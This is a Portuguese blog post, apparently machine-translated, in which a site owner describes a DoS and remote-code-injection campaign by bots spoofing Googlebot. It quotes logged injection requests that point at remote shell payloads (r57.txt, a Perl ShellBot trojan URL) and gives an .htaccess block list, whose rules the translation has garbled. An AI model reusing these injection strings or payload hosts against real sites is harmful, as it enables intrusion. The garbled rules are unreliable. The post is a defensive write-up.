Por esse passado três dias este blog está sofrendo ataques DoS. O ataque ainda está viva agora eu não acho que eles vão sair ainda. Eu cant banido esse bot directamente, como eles estavam enviando forjar pacote (Packet spoofing) como googlebot http://www.whois-search.com/whois/64.233.166.136. Im ainda olhando para a direita ISP.
Orgname: Google Inc. OrgID: GOGL Endereço: anfiteatro 1600 Parkway Cidade: Mountain View StateProv: CA CEP: 94043 País: E.U.
Na época eu sendo bloqueados todos os córregos remoto a partir de *. com seus aleatórias acolhimento e "perl bot assinatura", mas o bloqueio não irá impedi-los de martelar este site. Eu vou estar enviando 503 (Serviço indisponível) sobre certos pedido, assim, se você está tendo problema ao acessar este site verifique novamente mais tarde.
Tipo de injeções
Existe muita uri parâmetro na minha logs (vou deficientes servidor logs - limitar recursos) que provavelmente tem um grande inventários check-CMS listas de vulnerabilidades conhecidas. Só posso confirmar que o seu seo spams blackhat um bot em que solicitam uri incluem o típico order.php página.
/ es / wordpress / how-to-removido-wordpress-net-em-Spam-injeção-infectados-por-mike-ja gger-goro-class-mailphp/order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? / es / wordpress / order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? / order.php? wp = http://hom3.t35.com/xpl/hack/id.txt?
Para visualizar a seguinte fonte que você precisa excluir o site de seu anfitrião programa de antivírus.
- Perl / ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
- PHP / Rst.S Tróia - http://hom3.t35.com/xpl/fidz
htaccess bloqueado ruim Código Injector e Perl Bot (Botnet)
Se você tem problemas semelhantes. você deve bloquear as seguintes domínio na sua htaccess.
mod_setenvifSetEnvIfNoCase Referer "^ http:// (www.)? T35 \. Com.br" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Jorgevolio \. Com.br" 1 = codeinjector_ref SetEnvIfNoCase Referer "^ http:// (www.)? Emabe \. Com.br" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Pawang \. Em" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Gw-ouro \. Líquido" codeinjector_ref = 1 SetEnvIfNoCase User-Agent "^ libwww-perl *" 1 = shell_bots SetEnvIfNoCase User-Agent "^ Amidalla *" shell_bots = 1 <FilesMatch "(.*)"> Ordem permitir, negar Permitir que a partir de todos os Negar a partir de env = codeinjector_ref Negar a partir de env = shell_bots </ FilesMatch>
u arent se tem certeza se você servidor apoio mod_setenvif envolvê-la como o exemplo abaixo.
<IfModule Mod_setenvif.c> # ... substituir esta linha com o código acima ... </ IfModule>
Como armadilha Perl Shell Bot
Precisamos de um padrão para essa armadilha bots. certamente já sabíamos que esses bots:
- não honra robot.txt
- rastrear todos eles subdiretório
- eles tem uma estrutura pedido URI
Por enquanto eu só criar subdiretório para a auto-proibição (e algumas outras coisas) com base em seu padrão. alexa bot será muito banidos como eles dont robot.txt honra.
Vou estar atualizando este post de vez em quando. Faça o check artigos relacionados sobre a forma de pacotes spoofing e validação de forjar / spoof maço.
Recent Scan & atualização
A lista abaixo é adicionado automaticamente.
- 24 de dezembro de 2007
- ip: 64.26.63.10 param: login =,? injectar: http://pawang.in/r57.txt
- 24 de dezembro de 2007
- ip: 64.26.63.10 param: dir =, = login injectar: http://pawang.in/r57.txt??
- 25 de dezembro de 2007
- ip: 59.158.128.138 param: p =,: = injectar allinurl: http://gw-gold.net/jpg/pictures/test.txt
Recursos externos
- 21 de dezembro de 2007 às 10:48 pm
- 16 de fevereiro de 2008 às 3:05 am
- 0,3
- url
N º Responses to "Mass Remote Code Injection como Googlebot - Packet Spoofing Perl bot & Tróia"
Trackback URL: Use o TrackBack url ↑ ping para este artigo. Se o seu blog não suporta Trackbacks você pode querer deixar um comentário em seu lugar.
"escrever como se você estivesse conversando com um bom amigo (na frente de sua mãe)."
. a tua opinião
Aviso Importante: Para qualquer conteúdo que você postar, você decide conceder a Kakkoi a título gratuito, irrevogável, perpétuo, exclusiva e integralmente sublicenciável para utilizar, reproduzir, modificar, adaptar, publicar, traduzir, criar obras derivadas, distribuir, executar e exibir tal conteúdo, no todo ou em parte, em todo o mundo e para integrá-la em outras obras, de qualquer forma, mídia ou tecnologia atualmente conhecida ou posteriormente desenvolvida. Alguns direitos reservados.









A seguinte "Código" são concebidos para proteger você e outros usuários deste site.
A fim de manter estas experiências agradável e interessante para todos os nossos usuários, nós pedimos que você siga as diretrizes acima.
ser o primeiro a comentar.